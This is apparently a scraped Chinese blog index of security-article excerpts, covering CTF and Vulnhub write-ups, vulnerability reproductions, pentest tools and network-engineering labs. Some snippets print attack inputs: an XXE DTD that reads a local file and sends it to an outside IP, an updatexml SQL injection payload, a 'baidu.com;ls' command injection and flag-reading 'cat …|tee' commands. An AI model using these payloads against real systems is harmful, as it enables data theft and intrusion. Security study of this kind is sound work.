文章目录前言：一、端口安全二、防止MAC地址飘移（简易）三、为防止DHCP仿冒服务器攻击实验（接口方式）四、mac地址表安全前言： 这些都是以太网安全一些十分常用技术，都不是很难，最近心…

大厂超全安全测试--关于安全测试的分类及如何测试

安全测试（总结） 1.jsonNP劫持 （其实json劫持和jsonNP 劫持属于CSRF跨站请求伪造）的攻击范畴，解决方法和CSRF一样定义：构造带有jsonp接口的恶意页面发给用户点击，从而将用户的敏感信息通过js…

网络安全--Windows入侵排查

Windows入侵排查 Windows入侵排查思路 1、检查系统账号安全 1、查看服务器是否有弱口令，远程管理端口是否对公网开放检查方法：根据实际情况咨询相关服务器管理员，或者授权爆破2、查看服务器是狗存在可疑、新增账号检查方法：cmd输入lusrmgr.msc，查看是否有新增、可以账…

Vulnhub系列靶机---Deathnote: 1死亡笔记

文章目录信息收集主机发现端口扫描目录扫描dirsearchgobusterdirb扫描漏洞利用wpscan扫描Hydra爆破总结靶机文档：Deathnote: 1 下载地址：Download (Mirror) 难易程度：so Easy 信息收集主机发现端口扫描访问靶机的80端口，报…

网络安全（黑客技术）学习笔记

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

应急响应处理

应急响应 What is 应急响应对应的英文是 Incident response或emergency responcse，通常是指一个组织为了应对各种意外事件的发生所做的准备以及在事件发生后所采取的措施。当企业发生黑客入侵、系统崩溃货其他影响业务正常运行的安全时间是，急需第一时间进行处理，使企业…

漏洞总结（代码审计）

代码审计漏洞总结 SQL注入漏洞原理：由于开发者在编写操作数据库代码时，直接将外部可控的参数拼接到SQL语句中，没有经过任何过滤就直接放入数据库引擎执行。 SQL注入直接面对数据库进行攻击，危害不言而喻权限较大的情况下直接写入webshell或者系统命令，控制服务器权限…

代码审计步骤

代码审计步骤漏洞产生的原因 1、变量控制不严，一切输入都是有害的 2、变量到达有利用价值的函数（一切进入函数的变量都是有害的），漏洞的利用效果取决于最终函数的功能步骤 1、通读代码 2、利用工具查找漏洞关键字 3、审查追踪代码，确认漏洞 4、黑白灰盒测试工具 x…

2023年贵州省职业院校技能大赛高职组信息安全管理与评估竞赛试题

2023年贵州省职业院校技能大赛高职组信息安全管理与评估竞赛试题第一阶段竞赛项目试题根据信息安全管理与评估技术文件要求，第一阶段为网络平台搭建与网络安全设备配置与防护。本文件为信息安全管理与评估项目竞赛-第一阶段试题。介绍竞赛阶段任务阶段竞…

白捡一个存储型XSS

本文由掌控安全学院 - 杳若投稿起因利用fofa搜索时发现 org"China Education and Research Network Center" && body"/register" 任意用户注册在找到该CMS的时候发现存在任意用户注册的情况 http://xxxx.edu.cn/student/Register.ashx …

华为OD机试 - 查找众数及中位数（Java 2023 B卷 100分）

目录专栏导读一、题目描述二、输入描述三、输出描述四、解题思路五、Java算法源码六、效果展示1、输入2、输出3、说明华为OD机试 2023B卷题库疯狂收录中，刷题点这里专栏导读本专栏收录于《华为OD机试（JAVA）真题（A卷B卷&#…

【CTF-web】备份是个好习惯（查找备份文件、双写绕过、md5加密绕过）

题目链接：https://ctf.bugku.com/challenges/detail/id/83.html 经过扫描可以找到index.php.bak备份文件，下载下来后打开发现是index.php的原代码，如下图所示。由代码可知我们要绕过md5加密，两数如果满足科学计数法的形式的话&a…

等保三级--技术要求（一）

目录 1.物理安全 1.1物理位置的选择（G3） 1.2物理访问控制(G3） 1.3防盗窃和防破坏(G3) 1.4防雷击(G3) 1.5防火(G3) 1.6防水防潮(G3) 1.7防静电(G3) 1.8温湿度控制(G3) 1.9电力供应（A3） 1.10电磁防护&#xf…

亿赛通电子文档安全管理系统 RCE漏洞

亿赛通电子文档安全管理系统 RCE漏洞一、产品简介二、漏洞概述三、复现环境四、漏洞复现小龙POC检测: 五、修复建议免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失…

wazuh环境配置及漏洞复现

wazuh环境配置案例复现 wazuh环境配置 1.进入官网下载OVA启动软件 Virtual Machine (OVA) - Installation alternatives (wazuh.com) 2.进入VMware像配置其他虚拟机一样进行配置即可 3.上面会有提示：账号为，wazuh-user；密码，wa…

信息安全：入侵检测技术原理与应用.（IDS）

信息安全：入侵检测技术原理与应用. 入侵检测是网络安全态势感知的关键核心技术，支撑构建网络信息安全保障体系。入侵是指违背访问目标的安全策略的行为。入侵检测通过收集操作系统、系统程序、应用程序、网络包等信息，发现系统中违背安全策略…

漏洞复现 || Franklin Fueling Systems tsaupload.cgi 任意文件读取

漏洞描述 Franklin Electric Franklin Fueling Systems是美国Franklin Electric公司的一个加油系统，Franklin Fueling Systems tsaupload.cgi 存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器敏感文件。免责声明技术文章仅供参考，任…

缺少代码签名证书会怎么样？

在当下恶意软件攻击频发的情形下，使用代码签名证书来保护代码安全已经成为每个软件开发商的基本认知。代码签名证书将保护软件代码的完整性，避免软件被非法篡改或植入恶意代码病毒，从而使得软件可以正常运行。那么如果软件缺少代码签名证书会…

Vulnhub: DriftingBlues: 1靶机

kali：192.168.111.111 靶机：192.168.111.215 信息收集端口扫描 nmap -A -sC -v -sV -T5 -p- --scripthttp-enum 192.168.111.215 80端口首页源码访问noteforkingfish.txt，发现为Ook!加密的密文解密后提示需要用户eric和修改hosts文件&…

1.1 VMware Workstation与Kali的安装和配置1

资源见专栏第一篇文章https://blog.csdn.net/algorithmyyds/article/details/132457258 安装VMware 不多加赘述，直接按顺序安装即可。有以下需注意的地方： 1.建议选择增强型服务； 2.不要加入体验改进计划。是否开启提示更新看你的想法&…

春秋云镜:CVE-2019-9042(Sitemagic CMS v4.4 任意文件上传漏洞)

一、题目靶标介绍： Sitemagic CMS v4.4 index.php?SMExtSMFiles 存在任意文件上传漏洞，攻击者可上传恶意代码执行系统命令。进入题目： admin/admin /index.php?SMExtSMFiles&SMTemplateTypeBasic&SMExecModeDedicated&SMFil…

红蓝攻防：浅谈削弱WindowsDefender的各种方式

前言随着数字技术的日益进步，我们的生活、工作和娱乐越来越依赖于计算机和网络系统。然而，与此同时，恶意软件也日趋猖獗，寻求窃取信息、破坏系统或仅仅为了展现其能力。微软Windows，作为世界上最流行的操作系统&…

一文教你如何防御数据库渗透入侵

前言前段时间博主在做学校内部项目的时候，项目需要暂时上线测试，没想到上线测试几天，MySQL 数据库数据就被恶意删除，但是当时我们没有太当回事，以为只是一次普通黑客攻击，恢复数据之后仍然可以正常使用。…

【包过滤防火墙——iptables静态防火墙】的简单使用

文章目录规则链的分类--五链处理的动作iptables常用参数和作用防火墙就是堵和通的作用 iptables ：包过滤防火墙，是内核防火墙netfilter的管理工具核心：四表五链规则链的分类–五链在进行路由选择前处理的数据包：PREROUTIN…

网络安全（黑客）自学笔记学习路线

谈起黑客，可能各位都会想到：盗号，其实不尽然；黑客是一群喜爱研究技术的群体，在黑客圈中，一般分为三大圈：娱乐圈技术圈职业圈。娱乐圈：主要是初中生和高中生较多，玩网恋…

windows2003系统下phpstudy网站搭建

01 安装phpstudy 02 端口配置 03 参数开关配置 04 解压文件 05 查看ip 06 查看phpstudy是否安装成功 http://192.168.16.59:90/phpinfo.php07 搭建pikachu 08 搭建dvwa网站 09 搭建bwapp

Kali-linux绕过Utilman登录

Utilman是Windows辅助工具管理器。该程序是存放在Windows系统文件中最重要的文件，通常情况下是在安装系统过程中自动创建的，对于系统正常运行来说至关重要。在Windows下，使用WindowsU组合键可以调用Utilman进程。本节将介绍绕过Utilman程序登…

网安面试题大全（附答案）

本文面试题汇总： 防范常见的 Web 攻击重要协议分布层 arp协议的工作原理 rip协议是什么？rip的工作原理什么是RARP？工作原理 OSPF协议？OSPF的工作原理 TCP与UDP区别总结什么是三次握手四次挥手？ tcp为什么要三次握手…

什么是 Web安全？

什么是 Web安全？ Web安全是计算机术语。随着Web2.0、社交网络等一系列新型的互联网产品诞生问世，基于Web环境的互联网应用越来越广泛，企业信息化的过程中各种应用都架设在Web平台上，Web业务的迅速发展也引起黑客们的窥探&#x…

密码学：公钥密码.（非对称密码）

密码学：公钥密码. 公钥密码 (Public Key Cryptography)，又称为非对称密码，其最大特征是加密和解密不再使用相同的密钥，而使用不同的密钥。使用者会将一个密钥公开，而将另一个密钥私人持有，这时这两个密钥被…

kali基础命令（一）

一、常用命令 1、显示系统日期 date2、更新软件列表 apt-get update 3、更新软件 apt-get upgrade 4、清屏 clear5、重启 shutdown -r now 重启(1) reboot 重启(2)6、安装模块 apt-get install 模块名7、删除包及其依赖的软件包配置文件 apt-get remove --purge [packa…

kali linux安装教程

一、打开安装链接 https://www.kali.org/downloads/二、下载三、新建虚拟机 1、文件——>新建虚拟机 2、稍后安装操作系统 3、选择 Debian系统 4、命名虚拟机 5、指定磁盘容量 6、完成四、设置 1、ISO镜像设置五、kali安装 1、图形化安装 2、语言 3、区域 4、主机名 …

02.定级与备案

文章目录级别流程确定定级对象初步确定等级专家评审和定级核准备案审核本次从头梳理一下等保2.0涉及到的主要步骤：等保概述、定级备案、差距评估、规划设计、安全整改以及测评验收等。本节主要讲定级与备案的相关内容，涵盖一些流程以及具体定级和备案表格…

【Java 安全】Java加解密--对称/非对称加密，散列函数，数字签名

本文针对对称加密，非对称加密，散列函数和数字签名做一个简单的概述对称加密一、介绍对称加密是指加密和解密用同一个密钥对加密，加密就是通过密码和明文获取到密文，解密就是通过密文和密码，获取到明文优点&…

格凌科技浅谈数据中心的PUE值

随着5G、云计算、大数据等信息化进程的迅猛发展，各行各业都面临着大量数据存储和交换的问题。数据中心的建设也是必不可少的。2020年，因新冠疫情而带动线上服务的大规模应用，对数据中心将形成前所未有的依赖。疫情的影响将对数据中心市场带来…

eNSP动态路由综合试验（RIP）

需求： R1-R2-R3-R4-R5运行RIPV2 R6-R7运行RIPV1 1. 使用合理IP地址规划网络，各自创建换回接口 2. R1创建换回172.16.1.1/24 172.16.2.1/24 192.16.3.1/24 3. 要求R3使用R2访问R1环回 4. 减少路由条目数量，增加路由传递安全性 5. R5创建一个…

eNSP静态路由的综合实验

要求： 1.R6为isp，接口IP地址为公有地址，该设备只能配置IP地址，之后不能再对其进行其他任何配置； 2.R1-R5为局域网，私有IP地址192.168.1.0/24，请合理分配; 3.R1，R2,R4,各有两个环回…

网络安全（黑客）自学建议

建议一：黑客七个等级黑客，对很多人来说充满诱惑力。很多人可以发现这门领域如同任何一门领域，越深入越敬畏，知识如海洋，黑客也存在一些等级，参考知道创宇 CEO ic（世界顶级黑客团队 0x557 成员…

Web-文件上传漏洞总结

目录 1、常规前端绕过 2、修改文件类型 3、使用 .user.ini 或 .htaccess（可能还存在大小写绕过） 4、使用字典爆破可行后缀 5、结合文件包含漏洞使用图片马 6、条件竞争 1、常规前端绕过如下图，在前端存在限制，只能上传图片…

腾讯天幕：荣获首届“IPv6技术应用创新大赛”全国总决赛优秀奖

近日，首届“IPv6技术应用创新大赛”全国总决赛圆满落下帷幕。经过层层选拔、激烈角逐，腾讯参赛项目“IPv6时代下的腾讯天幕安全算力算法PaaS”凭借旁路部署、高阻断率、海量流量实时监控及处理、大数据实时处理分析、联动开放等核心优势，从15…

再获认可！腾讯连续三年被Gartner列为CWPP供应商之一

随着云的快速发展，企业的工作负载已经从服务器发展到虚拟机、容器、serverless等，部署的模式也日益复杂，包括公有云、混合云和多云等。在此背景下，传统的主机安全防护已无法满足需求，CWPP（云工作负载保护平…

数通运营商方向常见面试问题（第二部分）

HoVPN应用在上面场景？工作机制是什么？ HoVPN是分层的VPN（L3L3方案），现网主要应用在IPRAN场景。比较普通L3 MPLS VPN和HVPN的区别： 常规的MPLS BGP VPN的PE设备需要学习所创建的VRF的所有私网路由&#xff0…

bugku-源代码

点开后，要查看源代码猜测可能要输入的是flag,submit,Submit其中一个，但输入三个后都是显示“再好好看看” 然后，发现这样一串代码，猜测可以用url解密，得到下列解密信息 οnsubmitcheckSubmit;; eval(unescape(p1) …

一文带你了解动态NAT以及NAPT实验配置

动态nat实验配置组网需求如图1所示，某公司A区和B区的私网用户和互联网相连，路由器上接口GigabitEthernet3/0/0的公网地址为2.2.2.1/24，对端运营商侧地址为2.2.2.2/24。A区用户希望使用公网地址池中的地址（2.2.2.100&#xff5…

网络工程师考核的一些常见的问题：WLAN、BGP、交换机

主机上网的过程主机通过DHCP获取到一个IP地址和网关，通过这个IP地址上网， 我们上网的时候首先输入一个网址，里面包含了我们的域名， 通过DHCP分配的DNS服务器解析出域名所对应的IP地址验证IP地址和主机IP是不是一个网段&…

零基础如何自学网络安全？

第一阶段：学习一种或几种编程语言。网络安全也属于计算机范畴，涉及到IT行业的，编程语言是不可难免的。《Head First Python(第2版)》作为一种高级编程语言，Python越来越受到网络专家的欢迎。它之所以吸引人，主要…

AWD竞赛全流程解析

AWD(Attack With Defense，攻防兼备)是一个非常有意思的模式，你需要在一场比赛里要扮演攻击方和防守方，攻者得分，失守者会被扣分。也就是说，攻击别人的靶机可以获取 Flag 分数时，别人会被扣分，同…

常见的网络拓扑模型有哪些？要怎么去选择呢

网络拓扑结构很大程度上决定了网络的性能，而对于一个网络总体的管理者，网络拓扑模型选择就显得尤为重要了。常见的网络拓扑结构主要有星型结构、网状结构、环形结构、双平面等几种，可以适用于绝大多数广域网的构建，同时&#xff…

GitLab 目录遍历漏洞复现(CVE-2023-2825)

0x01 产品简介 Gitlab是目前被广泛使用的基于git的开源代码管理平台, 基于Ruby on Rails构建, 主要针对软件开发过程中产生的代码和文档进行管理，同时可以搭建Web服务。 0x02 漏洞概述 GitLab 存在目录遍历漏洞，当嵌套在至少五个组中的公共项目中存在附…

网络安全常用靶场推荐

sqli-labs sqli-labs包含了大多数的sql注入类型，以一种闯关模式，对于sql注入进行漏洞利用下载地址：https://github.com/Audi-1/sqli-labs xss challenges xsschallenges是一个专对于XSS漏洞练习的在线靶场，包含了各种绕过&#…

安全错误配置

安全错误配置定义安全配置错误可以发生在一个应用程序堆栈的任何层面，包括网络服务，平台，web服务器、应用服务器、数据库、框架、自定义的代码、预安装的虚拟机、容器、存储等。这通常是由于不安全的默认配置、不完整的临时配置、开源云存…

防火墙日志记录和监控在网络安全中的重要性

防火墙监视进出网络的流量，并保护部署网络的网络免受恶意流量的侵害。它是一个网络安全系统，根据一些预定义的规则监控传入和传出的流量。它以日志的形式记录有关如何管理流量的信息。日志数据包含流量的源和目标 IP 地址、端口号、协议等。为了有效地保…

web前端 -- javascript（02） -- 数据类型转换、常见运算符及顺序、选择和循环结构

数据类型转换 （1）自动类型转换： 特点：低类型自动向高类型进行转换 boolean < int < float < string PS： boolean类型如果与数值型进行运算：true 1；false 0其他基本数据类型与字符串…

vulnhub dc-9

1.信息搜集端口 80 20 filter 存活ip 172.16.1.65 2.访问网站进行信息搜集 cms staff 寻找漏洞登录处尝试弱口令失败，尝试sql失败 search处sql注入 3.sqlmap跑用户名和密码注意这题两个库的用户名和密码都需要 UserDetails，Users search处是post传参&…

xml外部实体注入（XXE）

XXE(xml外部实体注入) XML External Entity XXE介绍 XXE原理建立*.dtd <!ENTITY % file SYSTEM "php://filter/readconvert.base64-encode/resourcefile:///c:/1.txt"> <!ENTITY % int "<!ENTITY % send SYSTEM http://192.168.0.105:8080?p…

自学黑客/网络安全工具软件大全100套

黑客工具软件大全100套 1 Nessus：最好的UNIX漏洞扫描工具 Nessus 是最好的免费网络漏洞扫描器，它可以运行于几乎所有的UNIX平台之上。它不止永久升级，还免费提供多达11000种插件（但需要注册并接受EULA-acceptance–终端用户授权…

网络安全如何6个月成功上岸？

学前感言: 1.这是一条坚持的道路,三分钟的热情可以放弃往下看了. 2.多练多想,不要离开了教程什么都不会了.最好看完教程自己独立完成技术方面的开发. 3.有时多 google,baidu,我们往往都遇不到好心的大神,谁会无聊天天给你做解答. 4.遇到实在搞不懂的,可以先放放,以后再来解…

[ctfshow]击剑杯 web

文章目录近在眼前ssti盲注脚本给我看看通关大佬近在眼前 #!/usr/bin/env python3from flask import Flask, render_template_string, request from flask_limiter import Limiter from flask_limiter.util import get_remote_addressapp Flask(__name__) limiter Limiter…

网络安全真的这么好吗？

好不好应该指的是工作吧？我说说这个吧技术三分，七分看运气。实战跟测试环境是完全不一样的概念，思路>能力。以为工资很高是吧，其实不是，至少我们组织的工资真的不高，我拿到手的1w左右，公…

信息收集（六）之绕过CDN查找真实IP-part2

一、查找真实IP方法 1、dns历史绑定记录通过以下这些网站可以访问dns的解析，有可能存在未有绑cdn之前的记录。 https://dnsdb.io/zh-cn/ ###DNSDB查询 https://x.threatbook.cn/ ###微步在线 http://viewdns.info/ ###DNS、IP等查询 https://sitereport.netcraft…

腾讯安全周斌：用模型对抗，构建新一代业务风控免疫力

6月13日，腾讯安全联合IDC发布“数字安全免疫力”模型框架，主张将守护企业数据和数字业务两大资产作为企业安全建设的核心目标。腾讯安全副总裁周斌出席研讨论坛并发表主题演讲，他表示，在新技术的趋势影响下，黑灰产的攻…

深信服应用交付管理系统远程命令执行漏洞复现

文章目录深信服应用交付管理系统远程命令执行漏洞复现0x01 前言0x02 漏洞描述0x03 影响范围0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现深信服应用交付管理系统远程命令执行漏洞复现 0x01 前言本次测试仅供学习使用，如若非法他用，与本…

【漏洞复现】金和OA C6任意文件读取漏洞

漏洞描述金和OA协同办公管理系统C6软件共有20多个应用模块，160多个应用子模块，涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围，从功能型的协同办公平台上升到管理型协同…

网络安全几种加密方式

下面介绍几种网络传输加密方式： 注.这些加密涉及明文传输的，需要在https协议上加密传输 1.密钥散列采用MD5或者SHA1等散列算法，对明文进行加密（这里的加密仅对人，不对机器，因为这些算法机器可以用对应算…

一个综合资产收集和漏洞扫描工具

Komo 介绍 Komo是一个综合资产收集和漏洞扫描工具，并且支持进度记录，通过多种方式对子域进行获取，收集域名，邮箱，子域名存活探测，域名指纹识别，域名反查ip，ip端口扫描，w…

crypto：Url编码

题目下载题目所给的压缩包后解压，打开文件可得由题目可知为url编码，所以使用解码工具解码即可得到flag

web:[ACTF2020 新生赛]Exec

背景知识命令执行漏洞 linux命令题目打开题目，页面显示的是一个ping 尝试一下查看源代码发现尝试ping一下百度由题目名可知这道题关于exec（命令执行），这里需要联想到可以多条命令执行输入baidu.com;ls 尝试;号是否能够…

hack_me_please靶机攻略

hack_me_please 扫描探查无果，扫描js的时候有结果访问可以看到该页面可以看到是SeedDMS搭的应该和CMS类似渗透漏洞库查找一下有没有该漏洞使用whatweb扫描一下刚才的页面 whatweb http://10.4.7.154/seeddms51x/seeddms-5.1.22/ 这个版本高于漏洞库的&a…

网络安全（黑客）——自学篇

什么是网络安全？ 网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻…

2023年台州市第三届网络安全技能大赛(MISC)—Black Mamba

前言：当时比赛没有做出来现在来复现一下就当记录一下（这个思路没想到） Black Mamba： 一张图片常规得分离，属性，LSB，盲水印等都尝试过无果！ 考点：异或解密&#xff0…

http1,https,http2,http3总结

1.HTTP 当我们浏览网页时，地址栏中使用最多的多是https://开头的url，它与我们所学的http协议有什么区别？ http协议又叫超文本传输协议，它是应用层中使用最多的协议， http与我们常说的socket有什么区别吗？ …

Nessus安装与使用_nessus安装使用教程

前言： Nessus号称是世界上最流行的漏洞扫描程序，全世界有超过75000个组织在使用它。该工具提供完整的电脑漏洞扫描服务，并随时更新其漏洞数据库。Nessus不同于传统的漏洞扫描软件，Nessus可同时在本机或远端上遥控，进行…

ctfshow web入门 php特性 web136-web140

1.web136 还有一种写文件的命令时tee命令 payload： : ls /|tee 1 访问1下载查看文件1发现根目录下有flag cat /f149_15_h3r3|tee 2 访问下载查看文件22.web137 call_user_func <?php class myclass {static function say_hello(){echo "He…

网络安全扫描工具-xscan的安装和使用

1、将学习通上下载的xscan.rar进行解压。 2、将缺少的.dll文件粘贴到软件解压目录中。采取了关闭防火墙，退出杀毒软件等措施仍未解决。在百度寻找问题一直没得到解决，最后在第二天不经意发现任务管理器中仍然有联想自启的安全防护后台进程，…

BUUCTF在线评测简介

1、网站 BUUCTF在线评测简介 BUUCTF在线评测 BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台，为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges 2、介绍 3、学习步骤学习从这里开始！

高防CDN怎样保护网站安全的

在当今数字化时代，互联网安全问题日益严重。网络攻击和数据泄露威胁着个人隐私、企业机密以及关键基础设施的安全。在应对这些挑战方面，高防CDN（内容分发网络）崭露头角，它不仅提高了性能，还加强了网络安全。…

内容安全策略（Content Security Policy，CSP）

内容安全策略（Content Security Policy，CSP）是一个重要的安全机制，用于帮助保护网站免受恶意攻击和跨站脚本（XSS）等安全威胁。下面是对CSP的详细解释： 什么是内容安全策略（CSP&#…

横向移动如何阻止以及防范？

文章目录背景总结EDR设备监测 (这里以奇安信网神云锁为例) 背景今天面试，面试官问到了这一个问题，云主机被getshell了，进行了横向移动，如何进行阻止以及防范？当时回答了两个点：通过防火墙出入站策略设置…

BUUCTF题解之[极客大挑战 2019]EasySQL 1

1.题目分析考查sql注入的基本使用。 1.sql注入的定义 SQL注入是一种针对Web应用程序的攻击技术，通过在应用程序的用户输入参数中嵌入SQL代码，进而攻击应用程序的数据库。攻击者可以通过SQL注入来获取敏感信息、执行无权执行的操作、甚至完全控制数据…

网站如何优化加速，让网站降低延迟

优化网站架构精简页面加载过程：通过消除冗余代码和不必要的图像，并采用CDN资源分发，以减少加载时间。精心规划内容架构：通过使用恰当的标题和描述，使搜索引擎能够快速理解页面的内涵。选择性能出众的前端框架&…

解码yakit 适配中国的只要base64加密直接yakit

中国版的bp 浏览器上代理文件服务器 yakit yakit 劫持启动配置代理报错爆破模糊字典选择admin 选择第一步第二步成功

CTF是黑客大赛？新手如何入门CTF？

CTF是啥 CTF 是 Capture The Flag 的简称，中文咱们叫夺旗赛，其本意是西方的一种传统运动。在比赛上两军会互相争夺旗帜，当有一方的旗帜已被敌军夺取，就代表了那一方的战败。在信息安全领域的 CTF 是说，通过各种攻击手…

科普长文--网络安全拟态防御技术概念及应用

网络安全拟态防御技术概念什么是网络安全拟态防御？网络安全拟态防御技术是一种基于生物拟态原理，利用动态异构冗余构造、拟态伪装机制、测不准效应等手段，实现网络空间的主动防御和内生安全的技术。它是由中国工程院院士邬江兴首创的，旨在应对网络空间中的各种未知威胁…

TikTok Shop印尼站关停，跨境卖家该如何自救

10.4日，TikTok Shop宣布关停印尼站，无疑是一个巨大的炸弹投在整个跨境圈，让许多跨境卖家以及当地本土的卖家、品牌措手不及。这对TikTok的东南亚市场而言，无疑是一次沉重的打击。 TikTok在东南亚的商业布局，印尼是其…

网安周报|OpenSSF 推出恶意软件包存储库

1.OpenSSF 推出恶意软件包存储库为了应对恶意开源软件包日益增长的威胁，开源安全基金会 ( OpenSSF ) 推出了一项名为“恶意软件包存储库”的新计划。该存储库可能会成为打击恶意代码的主要参与者，旨在增强开源软件生态系统的安全性和完整性。该存储库已…

记一次红队打的逻辑漏洞（验证码绕过任意用户密码重置）

八月初参加某市演练时遇到一个典型的逻辑漏洞，可以绕过验证码并且重置任意用户的密码。首先访问页面，用户名处输入账号会回显用户名称，输入admin会回显系统管理员。（hvv的时候蓝队响应太快了，刚把admin的权限拿到了&a…

防火墙的发展与分类

包过滤防火墙（ACL五元组）：这是最早期的防火墙类型。包过滤防火墙在网络层上工作，基于源和目标的IP地址、端口号以及协议类型（TCP、UDP等） 来允许或拒绝数据包。然而，这种防火墙无法理解更高级别…

渗透测试常用专业术语

相信大家和我一样，搞不清这些专业名词的区别，所以我来整理一下。 1. POC、EXP、Payload与Shellcode POC：全称 Proof of Concept ，中文概念验证 ，常指一段漏洞证明的代码。 EXP：全称 Exploit &#xf…

网络安全工具

1.Nmap 它是网络管理员必用的软件之一，以及用以评估网络系统安全。正如大多数被用于网络安全的工具，nmap 也是不少黑客及骇客（又称脚本小子 ）爱用的工具。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器&#xff…

Thymeleaf解析表达式

首先springThymeleaf必过的点 org.springframework.web.servlet.DispatcherServlet#doDispatch那么先跟入handle()方法然后跟进handleInternal方法可以看到mav的获取方法，继续跟进invokeHandlerMethod 继续跟进invokeAndHandle 这里判断returnvalue是否有值…

SQL注入(四)之攻击类型与方式(下)

七 http header注入 01 登录 02 刷新登录之后的页面，Burpsuit抓包 03 http header注入在User-Agent输入payload： Mozilla or updatexml(1,concat(0x7e,database ()),0) or 八 Cookie注入 01 cookie注入利用http header注入部分的抓包结果进行注入…

webshell管理工具之蚁剑使用

一. 概述中国蚁剑是一款开源的跨平台网站管理工具，它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。二. 使用方法 1. 初始化蚁剑解压文件AntSword-v2.0.3-windows-x64.zip,antSword-master.zip. AntSword-v2.0.1为加载器 antSword-m…

python struct.pack_into打包数字字节流时序的大端小端一致性

struct.pack_into(’!f’, sendBuffer,偏移量, 要打包的数据) f前有！说明是大端储存即1.0浮点数占四个字节打包成字节流后的十六进制字符串为3f 80 00 00 struct.pack_into(‘f’, sendBuffer,偏移量, 要打包的数据) f前没有！说明是小端储存即1.0浮点…

Session 反序列化漏洞

将$_SESSION中保存的所有数据序列化存储到PHPSESSID对应的文件中有三种存取格式： （1）默认使用php：键名|键值（经过序列化函数处理的值） name|s:6:"1FonlY"; （2）php_seri…

windows2003下利用phpstudy进行sql注入

01 Sql注入 01 需要的文件 02 启动phpstudy 03 mysql数据库操作 create database abc charsetutf8; // 创建新库04 sql注入

windows2003下jboss环境搭建

01 安装jdk, 配置环境变量 01 安装jdk软件包 02 配置环境变量 01 新建系统变量，变量名为：JAVA_HOME 变量值：C:\Program Files\Java\jdk1.6.0_45\ 02 添加系统变量值,变量名：Path 变量值： %JAVA_HOME%\bin;%JAVA_…

eNSP：mpls综合实验

实验要求： 拓扑图路由、IP配置 r1: <Huawei>sys [Huawei]sys r1 [r1]int lo0 [r1-LoopBack0]ip add 192.168.1.1 24 [r1-LoopBack0]int g 0/0/0 [r1-GigabitEthernet0/0/0]ip add 192.168.2.1 30[r1]ip route-static 192.168.3.0 30 192.168.2.2 [r1]ip rou…

2023年第二届长沙市职业技能大赛“网络安全“项目样题任务书

2023年第二届长沙市职业技能大赛网络安全项目样题任务书模块A：企业基础设施安全A-1.任务一登录安全加固（windows、linux）A-2.任务二数据库加固（Linux）A-3.任务三服务加固 SSH\VSFTPD（Linux）A-4.任务四防火墙策略（Linux）模块B：网络安全事件响应、数字取证调查和应…

⚠️ 警告：JetBrains TeamCity 中的趋势 CVE-2023-42793

⚠️ 警告：JetBrains TeamCity 中的趋势 CVE-2023-42793 漏洞。 TeamCity 是一款持续集成和软件交付 (CI/CD) 解决方案。该漏洞是由于对服务器 API 的访问控制不足造成的，允许未经身份验证的攻击者访问管理面板。软件开发公司面临风险。利用该漏洞&…

计算机等级考试—信息安全三级真题七

目录一、单选题二、填空题三、综合题一、单选题

使用springboot服务端远程调试？试试HTTP实现服务监听

🎬 鸽芷咕：个人主页 🔥 个人专栏: 《初阶数据结构》《C语言进阶篇》 ⛺️生活的理想，就是为了理想的生活! 文章目录前言1. 本地环境搭建1.1 环境参数1.2 搭建springboot服务项目 2. 内网穿透2.1 安装配置cpolar内网穿透2.1.1 wi…

SASE安全访问服务边缘

自存用： 参考文档： 什么是安全访问服务边缘 (SASE)？ | Microsoft 安全网安人必读 ｜一文读懂SASE - 知乎

2021下半年网络工程师上午试题

1、微机系统中，( )不属于CPU的运算器组成部件。 A.程序计数器 B.累加寄存器 C.多路转换器 D.ALU单元 2、Python语言的特点不包括( ) A.跨平台、开源 B.编译型 C.支持面向对象程序设计 D.动态编程 3、软件测试时，白盒测试不能发现( ) A.代码路…

内网渗透-域信息收集

域环境虚拟机应用：vmware17 域控主机：win2008 2r 域成员主机：win2008 2r win7 一.域用户和本地用户区别使用本地用户安装程序时，可以直接安装使用域用户安装程序时，需要输入域控管理员的账号密码才能安装。总结…

InfoHound：一款针对域名安全的强大OSINT工具

关于InfoHound InfoHound是一款针对域名安全的强大OSINT工具，在该工具的帮助下，广大研究人员只需要提供一个Web域名，InfoHound就可以返回大量跟目标域名相关的数据。在网络侦查阶段，攻击者会搜索有关其目标的任何信息&#xff…

proxifier 2023年11月最新版的安装

前言 Proxifier 是一款功能非常强大的socks5客户端，可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。支持64位系统支持Xp，Vista，Win7，支持socks4，socks5，http 代理协议&#xf…

CVE-2017-15715 apache换行解析文件上传漏洞

影响范围 httpd 2.4.0~2.4.29 复现环境 vulhub/httpd/CVE-2017-15715 docker-compose 漏洞原理在apache2的配置文件： /etc/apache2/conf-available/docker-php.conf 中，php的文件匹配以正则形式表达 ".php$"的正则匹配模式意味着以.ph…

apachesolr启动带调试

这里solr.cmd报错，报错原因是java版本问题，后面发现这是因为多个java版本导致读取java_home失败， 那么我们修改solr.cmd中的JAVA_HOME为SOLR_JAVA_HOME IF DEFINED SOLR_JAVA_HOME set "JAVA_HOME%SOLR_JAVA_HOME%"环境变量将SOLR…

电脑监控软件安装教程（30秒钟教会你快速安装）

在现代化办公中，如果有需要安装电脑监控软件的可以参考下面这篇文章： 一、准备阶段可以自行到官网获取安装包，比如去域之盾官网，即可通过客服获取试用包。二、操作阶段 1、这个就是安装包，点击运行。 2、这个是正…

网络安全管理员高级工理论题库（持续更新中）

